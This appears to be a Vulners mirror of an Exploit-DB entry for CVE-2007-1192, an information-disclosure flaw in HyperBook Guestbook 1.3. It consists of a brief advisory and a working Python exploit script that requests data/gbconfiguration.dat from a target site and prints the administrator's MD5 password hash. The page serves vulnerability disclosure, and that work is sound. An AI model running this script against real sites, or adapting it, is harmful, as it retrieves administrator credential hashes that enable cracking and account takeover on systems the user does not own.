Lucene search
+L

HyperBook Guestbook 1.3 - GBConfiguration.DAT Hashed Password Information Disclosure

🗓️ 28 Feb 2007 00:00:00Reported by PeTrOType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 11515 Views

HyperBook Guestbook 1.3 allows information disclosure of hashed passwords, risking further attacks.

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2007-1192
2 Mar 200721:18
attackerkb
cve
CVE
CVE-2007-1192
2 Mar 200719:00
cve
cvelist
Cvelist
CVE-2007-1192
2 Mar 200719:00
cvelist
euvd
EUVD
EUVD-2007-1189
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-1192
2 Mar 200721:18
nvd
prion
Prion
Improper access control
2 Mar 200721:18
prion
securityvulns
securityvulns
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
3 Mar 200700:00
securityvulns
source: https://www.securityfocus.com/bid/22754/info

HyperBook Guestbook is prone to an information-disclosure vulnerability because the application fails to protect sensitive information.

An attacker can exploit this issue to access sensitive information that may lead to other attacks.

This issue affects version 1.3.0; other versions may also be affected.

#!/usr/bin/python
#Script                  :HyperBook Guestbook v1.30 (qbconfiguration.dat) Remote Admin md5 Hash Exploit
#Exploit Coded by        : PeTrO
#Exploit Discovered by   : SaO [www.saohackstyle.com]
#Credits to              :[soulreaver],Kuzey


import urllib
import sys
import parser

serv="http://"
i=0
for arg in sys.argv:
     i=i+1

if i!=3:
 print """\n\n
         \tHyperBook Guestbook v1.30  (qbconfiguration.dat)
         \t\t    Remote Admin md5 Hash Exploit
          \t
          \tUsage:Exploit.py [targetsite] [path]
          \tExample:Exploit.py www.target.com /guestbook/\n\n"""
else:


    adres=sys.argv[1]
    path=sys.argv[2]

    str1=adres.join([serv,path])
    str2=str1.join(['','data/gbconfiguration.dat'])

    print "\n[~]Connecting..."
    url=urllib.urlopen(str2).read();
    print "\n[+]Connected!"

    test=url.find(path);

    t=0;
    print "\n\t\t\t-=[Admin md5 hash]=-"
    while(url[test+1]!=1): #parsing hash... by PeTrO..
              print url[test],

              if(url[test]=='\n'):
                 t=t+1;

              if(t==2):
                 break;

              test=test+1;

    print "\n\n\t\t\t[ c0ded by PeTrO ]"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Nov 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02456
11515